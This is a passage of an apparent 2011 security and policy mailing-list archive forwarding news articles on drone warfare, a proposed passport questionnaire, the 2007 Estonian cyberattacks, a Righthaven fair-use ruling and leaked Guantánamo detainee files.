2011 12:58:27 -0400 Subject: [Infowarrior] - Pakistanizing the Libyan War Message-ID: <5830048A-E7DD-4130-89C1-E6F33B8E6353@infowarrior.org> Obama Takes the Cape Pakistanizing the Libyan War By FRANKLIN C. SPINNEY http://www.counterpunch.org/spinney04222011.html Taking the Cape is a time-honored term of art used in the Pentagon for luring your opponent into going for your solution, especially when it is not in his or her best interest. The analogy is to waving the red cape in front of the bull. While the psychological game of the dazzle and the stroke has been perfected in the Pentagon as a means for winning its domestic budget wars, the American military has been far less successful in beating its adversaries in a game that goes back to at least the time of Sun Tzu. Consider please the following On Thursday, April 22, Defense Secretary Robert Gates announced President Obama approved the initiation of drone strikes in Libya. The Vice Chairman of the Joint Chiefs of Staff, General James Cartwright claimed the drones were "uniquely suited" for attacks in urban areas because they can fly lower and get better visibility of targets, presumably, than pilots's eyeballs in airplanes. Gates went on to claim drone strikes Libya would be done for "humanitarian reasons." In other words, someone has sold Obama on Pakistaning the Libyan War, i.e., pursuing a military strategy of relying on drone attacks to a destroy an adversary hiding in the environmental background. What is astonishing is that Obama took the cape, despite the fact that only 12 days earlier, a report in the Los Angeles Times by David Cloud illustrated once again the absurdity of Cartwright's and Gates' claims. Cloud's report is worthy of very careful study, because it is loaded with all sorts of unexplored ramifications -- none of them good. Using actual transcripts of conversations among drone operators, David Cloud revealed the sinister psychological effects that so-called precision bombing and techno war has on its American participants. Their sterile dialogue shows vividly how the idea of precision techno warfare fought from a safe distance desensitizes our "warriors" to the bloody physical effects of their actions on the people they are maiming, and killing and the property they are destroying. There is no bravery or soldierly honor or spirit of self sacrifice among the bravado of the drone operators safely ensconced in Creech AFB, Nevada; they are simply cogs in a dysfunctional dehumanizing machine. That dysfunction is revealed by the complete absence in their dialogues of any psychological appreciation of their "adversary." Nor is there even hint of a desire to make such an appreciation. Consider for example, the emptiness in the following dialogue reported by Cloud: The Afghans unfolded what looked like blankets and kneeled. "They're praying. They are praying," said the Predator's camera operator, seated near the pilot. By now, the Predator crew was sure that the men were Taliban. "This is definitely it, this is their force," the cameraman said. "Praying? I mean, seriously, that's what they do." "They're gonna do something nefarious," the crew's intelligence coordinator chimed in. The lack of inquisitiveness into the mind of the enemy stands in stark contrast to the Pentagon's subtle psychological appreciation of its domestic adversaries (in this case the hapless President Obama, but also his predecessors reaching back to President Kennedy, as well as members of Congress) that has been so successful in waging and winning its budget battles to extract money from the American people. Extreme psychological one-sidedness on our side is nothing new in our military operations, however. It has been a central feature of the American way of techno war for a very long time. Indeed, the theory of the adversary being merely a physical set of targets (a dehumanized set of critical nodes devoid of any mental agility or moral strength) that can be defeated by simply by identifying and physically destroying these nodes is a doctrine that has been evolving and becoming more extreme since the development of daylight precision "strategic" bombardment doctrine by the US Army Corps in the 1930s. In WWII one set of critical nodes was the ball bearing factories, for example; today in Pakistan the critical nodes are Taliban and al Qaeda leadership targets (of course, history has shown repeatedly that the enemy is adaptable and so-call critical nodes can be worked around or replaced again and again). In Libya, we may have reached a new low, however. God only knows what a critical nodes are in the oxymoronic case of humanitarian attacks, other than assassinating Qaddafi. In fact as Patrick Cockburn has shown, we don't even know who our allies among the Libyans are, and some may well be former anti-American Islamists. Nevertheless, once again, the fallacious presumptions of techno war are coming into full flower. At the center of the theory of techno war is the comforting idea that precision bombardment (in WWII, via the technical wizardry of the Norden bombsight and the blind bombing systems like the H2X radar) would enable us to attack precision "military targets" deep in hostile territory while avoiding destruction of civilian lives and property. In fact, many of its proponents claimed, absurdly as it turned out, that daylight precision bombing of Germany would save lives by obviating the need a land invasion of Europe. The drone coupled with precision guided weapons merely evolves this original mentality to a new level of recklessness, because its gripping effect on the our psychology further disconnects the killer, sitting in his air conditioned operations center thousands of miles away from the killed, from the consequences of the killers actions. This clinical detachment creates the illusion that war is cleaner and easier to fight from our perspective -- civilian deaths become morally acceptable because they are merely accidents of good intentions. The clinical term "collateral damage" says it all. Cloud closes his report by describing the American apologies and financial payoffs to family survivors of civilians we inadvertently killed -- although given the emptiness of the dialogue revealed by Cloud, the idea of these deaths are collateral damage of a precision killing machine approaches the bizarre, to put it charitably. On the other hand, the idea that financial payoff of a few thousand dollars fits the dehumanizing model of techno war, because it ignores the mental and moral dimensions of war. In this case, the psychological natures of Pashtun concepts of honor and the Pashtun warrior ethos guarantee that financial payoffs will not mitigate their thirst for revenge, which will last for generations. But such psychological considerations have no place in the mechanistic mindset of techno war that views the adversary as a mere collection of physical targets and rationalizes civilian deaths as being unfortunate accidents of good intentions. The illusions of techno war are very soothing to its generalissimos like Clinton, Bush, and Obama, and its accompanying video games provide a great distraction to an American public being impoverished by government policies to redistribute wealth to the super rich. Moreover, by making war at a distance easier to prosecute and less painless to us (at least in the short term), the fallacies of techno war set the stage for our current state of perpetual war. Continuous small wars, or the threat of such wars, are necessary to prop up the sclerotic cold-war military - industrial - congressional complex, or MICC (see my essay The Domestic Roots of Perpetual War). Perpetual small wars, or the threat thereof, create a never ending demand for the MICC's high-tech, war-losing products, which are legacies of the now defunct Cold War, but without which the MICC could not survive in the post-cold war era. Keeping MICC budgets at cold war levels and higher also serves to reinforce the government policies to redistribute wealth to the rich and super rich. And that is why, every time the techno strategy fails to deliver on its promises, as it did with strategic bombing in WWII, Korea, Vietnam, the first Iraq War, Kosovo, the Second Iraq War, Afghanistan, and now in Libya, the solution is not a serious "lessons-learned" examination of why it did not deliver its promises of a quick clean victories, but instead, the solution is always the same: to recommend spending even more money for more expensive and complex versions of the same old idea, i.e., more and better sensors, more and better guidance systems, and more and better command, control, communications, computer, and intelligence systems. Franklin ?Chuck? Spinney is a former military analyst for the Pentagon. From rforno at infowarrior.org Sun Apr 24 21:46:43 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 24 Apr 2011 22:46:43 -0400 Subject: [Infowarrior] - Are drones a technological tipping point in warfare? Message-ID: Are drones a technological tipping point in warfare? By Walter Pincus, Sunday, April 24, 6:06 PM http://www.washingtonpost.com/world/are-predator-drones-a-technological-tipping-point-in-warfare/2011/04/19/AFmC6PdE_print.html Debates are growing at home and abroad over the increasing use of remotely piloted, armed drones, with a new study by the British Defense Ministry questioning whether advances in their capabilities will lead future decision-makers to ?resort to war as a policy option far sooner than previously.? Active and retired U.S. Air Force officers involved in developing drones stress that the aircraft brings in more decision-makers, better targeting data and more accurate delivery systems than fighter jets. But use of the unmanned aerial vehicles has drawn growing public scrutiny based on their lethal attacks in Pakistan against al-Qaeda, in Afghanistan against the Taliban, in Yemen against al-Qaeda in the Arabian Peninsula, and most recently in Libya, as announced Thursday by Defense Secretary Robert M. Gates. The British study noted that drones are becoming increasingly automated. With minor technical advances, it said, a drone could soon be able to ?fire a weapon based solely on its own sensors, or shared information, and without recourse to higher, human authority.? It cautioned that the Defense Ministry ?currently has no intention to develop? such systems. Nonetheless, the aircraft, piloted by people far from the battlefield, represents an approaching technological tipping point ?that may well deliver a genuine revolution in military affairs,? according to the Joint Doctrine Note, which was conducted under the direction of the British Chiefs of Staff. Titled ?The United Kingdom Approach to Unmanned Aircraft Systems,? it was first disclosed last week by the Guardian newspaper. The British study said it was essential that military officials not ?risk losing our controlling humanity and make war more likely? by using armed drones. It also asserted, however, that the laws of war call on commanders on both sides of the fight to limit loss of life and that ?use of unmanned aircraft prevents the potential loss of aircrew lives and is thus in itself morally justified.? At a Washington conference of the International Institute for Strategic Studies (IISS) last week, the issue of drones was also widely discussed. Lt. Col. Bruce Black, program manager for the Air Force Predator and Reaper aircraft, noted that some 180 people are involved in each drone mission. The result, he said, is that ?there is more ethical oversight involved with unmanned air vehicles than with manned aircraft.? At the same conference, former CIA director Michael V. Hayden described how, with a Predator circling overhead, those involved in ordering use of its missiles from thousands of miles away can call up computer maps that show the potential effects of each weapon. Before any of the Hellfire missiles are launched, he said, the backup team asks for the ?the bug splat? of the attack ? a readout of the impact the missile would have on its ground target. Nothing comparable can be done with ground-supporting manned aircraft, he said. But the drones have become part of the propaganda war where they are used. Without referencing the Taliban or al Qaeda, the British paper noted that insurgents have cast themselves as the underdog against a ?cowardly bully .?.?. that is unwilling to risk his own troops, but is happy to kill remotely.? Retired Lt. Gen. David Deptula, former Air Force deputy chief of staff for intelligence, surveillance and reconnaissance, acknowledged that the use of drones comes with potential problems with public perceptions. ?Our adversaries have interjected this as a question in [people?s] minds, as an attempt to limit the use of what is very, very effective,? he said. At the IISS conference, participants were asked whether drone operators had been desensitized to killing, because they were so far away from the battlefield. Col. Dean Bushey, deputy director of the Air Force Joint Unmanned Aircraft Systems Center, pointed out that the crews that run Predators in Nevada go through the exact routines that airplane pilots do prior to a mission. They go through a restricted area, wear brown flight suits, receive a mission brief and are put into a ?warrior ethos? before ever stepping into a ground control station. ?You are executing a mission to save lives,? he said. Black said that when a Predator operator is connected to a fighter on the ground in Afghanistan, ?you can hear his voice and you can hear the bullets whistling over his head. You feel that pressure.? He vividly described an operator in Nevada, sitting at a computer console and listening and looking at his colleague thousands of miles away through a micro-picture view. ?My situational awareness of what he is going through at that time is probably better than a guy that showed up at 10 minutes on station and dropped a weapon and left,? Black said. ?I see my effects, I watched, I listened, I was with him the five hours prior to that. .?.?. I?d say we are very much in the fight.? ? 2011 The Washington Post Company From rforno at infowarrior.org Mon Apr 25 06:50:18 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 07:50:18 -0400 Subject: [Infowarrior] - New State Dept passport application is INSANE Message-ID: <0C1CF999-52E4-41B1-A30E-C7FC191DFF16@infowarrior.org> (c/o PM) Somebody please tell me this proposed application for a US passport/renewal isn't some giant USG-sponsored hoax. This is almost as bad as applying for a DOD clearance.....and DOD doesn't ask if you've been circumcised! As PM told me, "I guess they [USG] don't want you leaving the country then." Let us hope cooler minds prevail, and/or this is all just some poor April Fools' prank. --- rick 60-Day Notice of Proposed Information Collection: DS-5513, Biographical Questionnaire for U.S. Passport, 1405-XXXX http://www.federalregister.gov/articles/2011/02/24/2011-4154/60-day-notice-of-proposed-information-collection-ds-5513-biographical-questionnaire-for-us-passport BIOGRAPHICAL QUESTIONNAIRE FOR A U.S. PASSPORT http://papersplease.org/wp/wp-content/uploads/2011/03/ds5513-proposed.pdf -- more info -- State Dept. proposes ?Biographical Questionnaire? for passport applicants The U.S. Department of State is proposing a new Biographical Questionnaire for passport applicants. The proposed new Form DS-5513 asks for all addresses since birth; lifetime employment history including employers? and supervisors names, addresses, and telephone numbers; personal details of all siblings; mother?s address one year prior to your birth; any ?religious ceremony? around the time of birth; and a variety of other information. According to the proposed form, ?failure to provide the information requested may result in ? the denial of your U.S. passport application.? The State Department estimated that the average respondent would be able to compile all this information in just 45 minutes, which is obviously absurd given the amount of research that is likely to be required to even attempt to complete the form. < -- > http://www.papersplease.org/wp/2011/03/18/state-dept-proposes-biographical-questionnaire-for-passport-applicants/ From rforno at infowarrior.org Mon Apr 25 07:35:48 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 08:35:48 -0400 Subject: [Infowarrior] - Cyberwarriors on the Eastern Front: In the line of fire packet floods Message-ID: Original URL: http://www.theregister.co.uk/2011/04/25/estonia_cyberwar_interview/ Cyberwarriors on the Eastern Front: In the line of fire packet floods Former senior Estonian defence official talks cyberwar with El Reg By John Leyden Posted in Enterprise Security, 25th April 2011 09:00 GMT Interview Estonian government ministers and officials deep in a crisis meeting about riots on the street in April 2007 were initially nonplussed when a government press officer interrupted a briefing to say that he was unable to post a press release. The initial reaction was "why are you bothering us with this" explained Lauri Almann, permanent undersecretary at the Estonian Ministry of Defence at the time told El Reg. "It was only when he said 'No you don't understand, I think we are under cyberattack' that anybody took notice," Almann explained. Estonia, a small country of around 1.3 million people bordering Russia and the Baltic Sea, has moved swiftly since independence in 1991 to develop an advanced network infrastructure for the delivery of both government and financial services. The country completely skipped the phase of banking involving cheques, for example, so that the vast majority of its citizens use online banking to pay bills and carry out other day-to-day tasks. The disruption when these facilities abruptly ceased to work was therefore all the more severe. Cyberblitz Both government and private sector systems in Estonia came under fierce cyberassault in April 2007. This coincided with street-level riots that accompanied the relocation of World War II (Soviet era) memorials. The riots pitted ethnic Russians in the country against ethnic Estonians and the police. The denial of service attacks that kicked in around two days after the street protests began left important government, banking and news media websites unavailable. The unavailability of government and news media websites was important because it prevented the government getting information out at a time of crisis. Estonia does not have BBC and CNN bureaus and the culture of using the radio to get news, if all else fails, isn't as ingrained there as it would be in the UK, for example. More Estonians rely on the web for news so the attacks left them deprived of updates. The first wave of "brute force" packet flooding assaults was followed by more sophisticated attacks, including website defacement, and site takeovers. For example, a fake apology over the relocation of the monuments was posted on the website of one political party. In total the attacks lasted around three weeks. "It could have been much worse," Almann explained. "We thought they might go on for up to three months. Technically the attacks we faced were nothing special," he added. In the line of fire Estonia responded to the cyberattacks, in part, by increasing bandwidth and organising backup hosting for government websites. The process of replicating content in the midst of the ongoing attack was unsurprisingly difficult. "Many countries refused to take our sites because they said that would put them in the line of fire," Almann said. Speculation since the attacks, a landmark event in computer security, suggest they were fermented in the "Russian blogosphere" and may have involved criminal hackers turned patriots. Some have suggested that the Russian government may have played a role in encouraging these attacks, a charge dismissed by the Kremlin. Estonian Foreign Minister Urmas Paet, for example, pointed the finger of blame [1] for the attacks directly at the Kremlin. A question of attribution Almann was more circumspect. An estimated 1 to 2 million compromised machines in 100 different jurisdictions, including the Vatican, were used in the cyberattacks against Estonia. The use of botnets, which can be rented and paid for anonymously on the digital underground, makes tracing the real source of attacks difficult if not impossible. Instead of relying on purely technical attribution to find a "smoking gun" political and legal attribution also has a role to play. Almann said that many countries helped Estonia at the time of the attacks with one important exception ? Russia. "Russia failed to help put out the attacks. Repeated requests for assistance were denied, sometimes for obscure legal reasons," he told El Reg. For example, Estonia and Russia have an agreement covering the investigation of cross-border crime which covers the exchange of info as well as the extradition of suspects who might decide to skip over the border to avoid justice. "Treaty requests for information at the time of the cyberattack were repeatedly refused or not acted upon. This refusal to co-operate provides political attribution for the attacks," Almann said. Clueless spotters green-lit porn site for cyber carpet bombing Just one person, an ethnic-Russian Estonian national, has been charged and convicted of the attack. Dmitri Galushkevich, 20, was fined the local equivalent of $1,200 after he was convicted of attacks against the Reform Party of Estonian Prime Minister Andrus Ansip. "He was not accountable as an organiser but a schoolboy providing targets via chat forums," Almann explained, adding in some instances the attackers were misdirected by their spotters on the ground. One wave of attacks, for example, took out an adult entertainment (porn) website instead of an Estonian state security site. Estonia's analysis of the attacks reveals that small-scale ping attacks, used to carry out reconnaissance of targets, preceded the main assaults, which came in phases. "The main phase of the attack involved voluntary political botnets, predominately located in Russia, which Almann described as "easy to block", as well as assaults of growing sophistication from compromised machines around the world. The attacks against Estonia, the first of their kind on a country-wide level, have been studied intensively by military planners since. In 2008, cyberattacks on Georgian websites and communication facilities accompanied a ground war between Russia and Georgia. Estonia, along with Poland, stepped in to offer backup hosting of Georgian government website. Almann argues this process needs to be more organised. "We need pan-European backup hosting for critical websites," he said. Rules of engagement Almann reckons that rules for the investigation of cyberattacks need to be established by more countries signing up to the Council of Europe Convention on Cybercrime. Russia and China and several other key countries have not signed the treaty while some countries in Europe, including the UK, have signed but not ratified the regulations. Russia might be encouraged to sign the treaty by making it a condition of World Trade Organisation negotiations, he suggested, adding the issue of cyberconflict ought to be on the agenda of G8 talks that include Russia and the world's seven biggest economies. Some observers have suggested that a Geneva Convention for cyberwar might be needed, an idea Almann regards as a non-starter even though he's equally adamant that cyberwar is all too real. "With applications such as Stuxnet attacks are growing more sophisticated," Almann said. "There are really serious capabilities out there." "However banning the use of cyberweapons is not realistic. Cyberwar is out there and everybody is involved." Offence is the best form of attack Plenty of governments talk about boosting the capability of their cyber-defences but very few, at least publicly, talk about cyber-offensive capabilities. Cyber-offensive capabilities might involve attacking a particular botnet of compromised PCs or disrupting the communication channels an enemy is using to co-ordinate attacks. Almann reckons most countries are developing cyber-offensive capabilities. "Sovereign nations need the capability. It's unavoidable," he said. However establishing rules to govern the use of such weapons is something else, in Almann's opinion. "A Geneva convention for cyberwar is not going to work," he said. "I'm a lawyer and I wouldn't know what to write. The field is so fast-developing that you are going to get it wrong. "This is not burning issue and shouldn't divert attention from dealing with shortcomings of critical national infrastructure systems," he added. Preparing for the next cyberwar Preparations for cyber-defence include running cybersecurity exercises and establishing what Almann described as "matrices of co-operation". He said: "It's better to have many people working together, and the ability to delegate decisions, than a cyber-czar," adding that Estonia was establishing an independent cyber unit in its equivalent of the voluntary part-time Territorial Army (the US equivalent would be National Guard). Russia, by contrast, appears to have used a militia of criminal hackers to fight its battles, at least if rumours over the cyber-conflict in Estonia and Georgia are to be believed. Almann said this approach was dangerous. "Provide the [modern equivalent] of letters of mark to cyber-profiteers, entitling them to loot or pillage when they are not working for you, is dangerous," Almann said. "Criminals can easily turn against you." But what are cyber-defenders preparing for, exactly? The UK's defence review last year placed cyberattacks on a par with international terrorism as the greatest threats facing the UK, a judgment Almann agreed with. Almann argued that "every military conflict is going to have a cyber-component" in future. "There are sophisticated attack scenarios but normally you never want to truly knock out your enemies' network because then you eliminate the battlefield. Instead you want to create confusion and misinformation," he said. Cyberwar would not be limited to nation-state against nation-state conflicts, with insurgency-style cyber-conflicts also more than possible. "The opportunities to attack in cyberspace are huge for anyone with imagination," he said. The former top-ranking civil servant turned lawyer and university lecturer spoke to us of phishing, espionage and attacks more sophisticated than those faced by Estonia as among the threats, which might come from terrorist groups such as Al Queda as well as state-sponsored hackers or intelligence agencies. "You should never prepare for the last war," he concluded. Some have criticised the debate on cyberwar for focusing on Hollywood-style attack scenarios of lone hackers taking out power grids, for example. However Almann reckon that cyberdefence brainstorming sessions are best run in an open environment where even "crazy ideas" can be suggested. "You need to come up with the meanest scenarios before you discuss whether they are realistic or not," Almann said. Almann, an experienced lawyer and diplomat, would be the first to admit he's not a technologist. For an expert take on what the real ? as opposed to Hollywood-inspired ? threats in cyberspace might be, we asked Chris Wysopal (AKA Weld Pond), a former member of Boston-area hacking collective L0pht, turned founder of application security firm VeraCode. Members of the group famously testified before Congress in May 1998 that they would be able to take down the internet in 30 minutes using shortcomings of the BGP routing protocol that were endemic in international telecom networks at the time. Although that particular hole has long been plugged, it remains the case that critical infrastructure systems are wide open to attack, Wysopal told El Reg. "The only safe way is to air-gap critical infrastructure systems," he said, adding that removable media also posed a big threat from information leakage, as the WikiLeaks case illustrates. Wysopal agreed with Almann that most countries are developing offensive cyber-capabilities, even if they don't like to talk about it. "The equivalent of special forces units are building [cyberwar] tools. Meanwhile countries are training soldiers, the equivalent of infantry, to use those tools," Wysopal said, adding that he reckons any country with nukes is also likely to have offensive cyberwarfare capability. "Cyber-weapons can be used to amplify the effects of other attacks or carry out cyber-sabotage, like Stuxnet. It takes an army to carry out cyberwar because there are hundreds of targets." Attackers have a built-in advantage over cyber-defenders because of the "asymmetrical" nature of cyberwar, he concluded. "Defence needs to plug all the holes, while those on the offence only need to find one," he said. ? Links ? http://www.csmonitor.com/2007/0517/p99s01-duts.html From rforno at infowarrior.org Mon Apr 25 09:39:24 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 10:39:24 -0400 Subject: [Infowarrior] - Another Judge Slams Righthaven Message-ID: <532F6E88-F1C0-419E-8CAB-91EBA8645D64@infowarrior.org> Another Judge Slams Righthaven For Chilling Effects That Do Nothing To Advance Copyright Act's Purpose from the a-lesson-in-fair-use dept http://www.techdirt.com/articles/20110423/01033814013/another-judge-slams-righthaven-chilling-effects-that-do-nothing-to-advance-copyright-acts-purpose.shtml Back in March, Judge James Mahan had verbally stated that he intended to rule that the non-profit Center for Intercultural Organizing (CIO) was protected by fair use, in posting a full article from the Las Vegas Review-Journal. This was impressive, in part, because CIO hadn't even raised a fair use defense itself. Instead, the judge brought it up in the first place. Now the official ruling has come out, and it's a beauty. Not only does it go through why posting an entire article can still be fair use, but it slams Righthaven for its actions, noting how it has a "chilling effect" on speech, and its actions do not advance the Copyright Act's purpose. You can read the whole thing, but the conclusion summarizes it all nicely: The court finds that the defendant?s use of the copyrighted article in this case constitutes fair use as a matter of law. The article has been removed from its original context; it is no longer owned by a newspaper; and it has been assigned to a company that uses the copyright exclusively to file infringement lawsuits. Plaintiff's litigation strategy has a chilling effect on potential fair uses of Righthaven-owned articles, diminishes public access to the facts contained therein, and does nothing to advance the Copyright Act?s purpose of promoting artistic creation. Bam. It's really great to see one judge after another condemning Righthaven, and showing that its business model strategy of using the courts to pressure people to settle isn't fooling anyone. Separately, I did want to dig in a bit on the fact that CIO used the entire article and yet it was still deemed fair use. Some people assume that if you use the entire work, it can never be fair use. We've certainly pointed to plenty of exceptions to this claim in the past, but the judge's discussion on this particular fact is quite interesting and worth reading: Here, the court finds that, although the defendants posted the work in its entirety, the amount used was reasonable in light of the purpose of the use, which was to educate the public about immigration issues. Because of the factual nature of the work, and to give the full flavor of the information, the defendants used the entire article rather than trying to distill it. The court finds that it would have been impracticable for defendants to cut out portions or edit the article down. See e.g, Campbell, 510 U.S. at 588?89 (noting that for a parody to be effective, it must take enough material to evoke the original). This is really great, and hopefully similar thinking will find its way to other courts as well. "The amount used was reasonable in light of the purpose of the use." I'll have to remember that line the next time someone insists there's no fair use if you use the whole thing. From rforno at infowarrior.org Mon Apr 25 17:09:01 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 18:09:01 -0400 Subject: [Infowarrior] - Classified Files Offer New Insights Into Detainees Message-ID: <893DF24B-246A-42ED-9474-F806DBA7FDB1@infowarrior.org> April 24, 2011 Classified Files Offer New Insights Into Detainees http://www.nytimes.com/2011/04/25/world/guantanamo-files-lives-in-an-american-limbo.html By CHARLIE SAVAGE, WILLIAM GLABERSON and ANDREW W. LEHREN WASHINGTON ? A trove of more than 700 classified military documents provides new and detailed accounts of the men who have done time at the Guant?namo Bay prison in Cuba, and offers new insight into the evidence against the 172 men still locked up there. Military intelligence officials, in assessments of detainees written between February 2002 and January 2009, evaluated their histories and provided glimpses of the tensions between captors and captives. What began as a jury-rigged experiment after the 2001 terrorist attacks now seems like an enduring American institution, and the leaked files show why, by laying bare the patchwork and contradictory evidence that in many cases would never have stood up in criminal court or a military tribunal. The documents meticulously record the detainees? ?pocket litter? when they were captured: a bus ticket to Kabul, a fake passport and forged student ID, a restaurant receipt, even a poem. They list the prisoners? illnesses ? hepatitis, gout, tuberculosis, depression. They note their serial interrogations, enumerating ? even after six or more years of relentless questioning ? remaining ?areas of potential exploitation.? They describe inmates? infractions ? punching guards, tearing apart shower shoes, shouting across cellblocks. And, as analysts try to bolster the case for continued incarceration, they record years of detainees? comments about one another. The secret documents, made available to The New York Times and several other news organizations, reveal that most of the 172 remaining prisoners have been rated as a ?high risk? of posing a threat to the United States and its allies if released without adequate rehabilitation and supervision. But they also show that an even larger number of the prisoners who have left Cuba ? about a third of the 600 already transferred to other countries ? were also designated ?high risk? before they were freed or passed to the custody of other governments. The documents are largely silent about the use of the harsh interrogation tactics at Guant?namo ? including sleep deprivation, shackling in stress positions and prolonged exposure to cold temperatures ? that drew global condemnation. Several prisoners, though, are portrayed as making up false stories about being subjected to abuse. The government?s basic allegations against many detainees have long been public, and have often been challenged by prisoners and their lawyers. But the dossiers, prepared under the Bush administration, provide a deeper look at the frightening, if flawed, intelligence that has persuaded the Obama administration, too, that the prison cannot readily be closed. Prisoners who especially worried counterterrorism officials included some accused of being assassins for Al Qaeda, operatives for a canceled suicide mission and detainees who vowed to their interrogators that they would wreak revenge against America. The military analysts? files provide new details about the most infamous of their prisoners, Khalid Shaikh Mohammed, the planner of the Sept. 11, 2001, attacks. Sometime around March 2002, he ordered a former Baltimore resident to don a suicide bomb vest and carry out a ?martyrdom? attack against Pervez Musharraf, then Pakistan?s president, according to the documents. But when the man, Majid Khan, got to the Pakistani mosque that he had been told Mr. Musharraf would visit, the assignment turned out to be just a test of his ?willingness to die for the cause.? The dossiers also show the seat-of-the-pants intelligence gathering in war zones that led to the incarcerations of innocent men for years in cases of mistaken identity or simple misfortune. In May 2003, for example, Afghan forces captured Prisoner 1051, an Afghan named Sharbat, near the scene of a roadside bomb explosion, the documents show. He denied any involvement, saying he was a shepherd. Guant?namo debriefers and analysts agreed, citing his consistent story, his knowledge of herding animals and his ignorance of ?simple military and political concepts,? according to his assessment. Yet a military tribunal declared him an ?enemy combatant? anyway, and he was not sent home until 2006. Obama administration officials condemned the publication of the classified documents, which were obtained by the anti-secrecy group WikiLeaks last year but provided to The Times by another source. The officials pointed out that an administration task force set up in January 2009 reviewed the information in the prisoner assessments, and in some cases came to different conclusions. Thus, they said, the documents published by The Times may not represent the government?s current view of detainees at Guant?namo. Among the findings in the files: ?The 20th hijacker: The best-documented case of an abusive interrogation at Guant?namo was the coercive questioning, in late 2002 and early 2003, of Mohammed Qahtani. A Saudi believed to have been an intended participant in the Sept. 11 attacks, Mr. Qahtani was leashed like a dog, sexually humiliated and forced to urinate on himself. His file says, ?Although publicly released records allege detainee was subject to harsh interrogation techniques in the early stages of detention,? his confessions ?appear to be true and are corroborated in reporting from other sources.? But claims that he is said to have made about at least 16 other prisoners ? mostly in April and May 2003 ? are cited in their files without any caveat. ?Threats against captors: While some detainees are described in the documents as ?mostly compliant and rarely hostile to guard force and staff,? others spoke of violence. One detainee said ?he would like to tell his friends in Iraq to find the interrogator, slice him up, and make a shwarma (a type of sandwich) out of him, with the interrogator?s head sticking out of the end of the shwarma.? Another ?threatened to kill a U.S. service member by chopping off his head and hands when he gets out,? and informed a guard that ?he will murder him and drink his blood for lunch. Detainee also stated he would fly planes into houses and prayed that President Bush would die.? ?The role of foreign officials: The leaked documents show how many foreign countries sent intelligence officers to question Guant?namo detainees ? among them China, Russia, Tajikistan, Yemen, Saudi Arabia, Jordan, Kuwait, Algeria and Tunisia. One such visit changed a detainee?s account: a Saudi prisoner initially told American interrogators he had traveled to Afghanistan to train at a Libyan-run terrorist training camp. But an analyst added: ?Detainee changed his story to a less incriminating one after the Saudi Delegation came and spoke to the detainees.? ?A Qaeda leader?s reputation: The file for Abd al-Rahim al-Nashiri, who was charged before a military commission last week for plotting the bombing of the American destroyer Cole in 2000, says he was ?more senior? in Al Qaeda than Khalid Shaikh Mohammed, and describes him as ?so dedicated to jihad that he reportedly received injections to promote impotence and recommended the injections to others so more time could be spent on the jihad (rather than being distracted by women).? ?The Yemenis? hard luck: The files for dozens of the remaining prisoners portray them as low-level foot-soldiers who traveled from Yemen to Afghanistan before the Sept. 11 attacks to receive basic military training and fight in the civil war there, not as global terrorists. Otherwise identical detainees from other countries were sent home many years ago, the files show, but the Yemenis remain at Guant?namo because of concerns over the stability of their country and its ability to monitor them. ?Dubious information: Some assessments revealed the risk of relying on information supplied by people whose motives were murky. Hajji Jalil, then a 33-year-old Afghan, was captured in July 2003, after the Afghan chief of intelligence in Helmand Province said Mr. Jalil had taken an ?active part? in an ambush that killed two American soldiers. But American officials, citing ?fraudulent circumstances,? said later that the intelligence chief and others had participated in the ambush, and they had ?targeted? Mr. Jalil ?to provide cover for their own involvement.? He was sent home in March 2005. ?A British agent: One report reveals that American officials discovered a detainee had been recruited by British and Canadian intelligence to work as an agent because of his ?connections to members of various Al-Qaeda-linked terrorist groups.? But the report suggests that he had never shifted his militant loyalties. It says that the Central Intelligence Agency, after repeated interrogations of the detainee, concluded that he had ?withheld important information? from the British and Canadians, and assessed him ?to be a threat? to American and allied personnel in Afghanistan and Pakistan. He has since been sent back to his country. ?A journalist?s interrogation: The documents show that a major reason a Sudanese cameraman for Al Jazeera, Sami al-Hajj, was held at Guant?namo for six years was for questioning about the television network?s ?training program, telecommunications equipment, and newsgathering operations in Chechnya, Kosovo, and Afghanistan,? including contacts with terrorist groups. While Mr. Hajj insisted he was just a journalist, his file says he helped Islamic extremist groups courier money and obtain Stinger missiles and cites the United Arab Emirates? claim that he was a Qaeda member. He was released in 2008 and returned to work for Al Jazeera. ?The first to leave: The documents offer the first public look at the military?s views of 158 detainees who did not receive a formal hearing under a system instituted in 2004. Many were assessed to be ?of little intelligence value? with no ties to or significant knowledge about Al Qaeda or the Taliban, as was the case of a detainee who was an Afghan used car salesman. But also among those freed early was a Pakistani who would become a suicide attacker three years later. Many of the dossiers include official close-up photographs of the detainees, providing images of hundreds of the prisoners, many of whom have not been seen publicly in years. The files ? classified ?secret? and marked ?noforn,? meaning they should not be shared with foreign governments ? represent the fourth major collection of secret American documents that have become public over the past year; earlier releases included military incident reports from the wars in Afghanistan and Iraq and portions of an archive of some 250,000 diplomatic cables. Military prosecutors have accused an Army intelligence analyst, Pfc. Bradley Manning, of leaking the materials. The Guant?namo assessments seem unlikely to end the long-running debate about America?s most controversial prison. The documents can be mined for evidence supporting beliefs across the political spectrum about the relative perils posed by the detainees and whether the government?s system of holding most without trials is justified. Much of the information in the documents is impossible to verify. The documents were prepared by intelligence and military officials operating at first in the haze of war, then, as the years passed, in a prison under international criticism. In some cases, judges have rejected the government?s allegations, because confessions were made during coercive interrogation or other sources were not credible. In 2009, a task force of officials from the government?s national security agencies re-evaluated all 240 detainees then remaining at the prison. They vetted the military?s assessments against information held by other agencies, and dropped the ?high/medium/low? risk ratings in favor of a more nuanced look at how each detainee might fare if released, in light of his specific family and national environment. But those newer assessments are still secret and not available for comparison. Moreover, the leaked archive is not complete; it contains no assessments for about 75 of the detainees. Yet for all the limitations of the files, they still offer an extraordinary look inside a prison that has long been known for its secrecy and for a struggle between the military that runs it ? using constant surveillance, forced removal from cells and other tools to exert control ? and detainees who often fought back with the limited tools available to them: hunger strikes, threats of retribution and hoarded contraband ranging from a metal screw to leftover food. Scores of detainees were given disciplinary citations for ?inappropriate use of bodily fluids,? as some files delicately say; other files make clear that detainees on a fairly regular basis were accused by guards of throwing urine and feces. No new prisoners have been transferred to Guant?namo since 2007. Some Republicans are urging the Obama administration to send newly captured terrorism suspects to the prison, but so far 